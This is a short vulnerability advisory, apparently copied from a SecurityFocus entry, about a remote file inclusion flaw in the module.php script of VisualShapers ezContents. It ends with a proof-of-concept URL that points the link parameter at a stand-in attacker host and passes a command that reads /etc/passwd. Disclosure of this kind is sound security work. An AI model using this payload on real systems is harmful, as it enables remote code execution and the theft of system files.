5 lines
No EOL
375 B
Text
5 lines
No EOL
375 B
Text
source: http://www.securityfocus.com/bid/9396/info
|
|
|
|
A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.
|
|
|
|
http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd |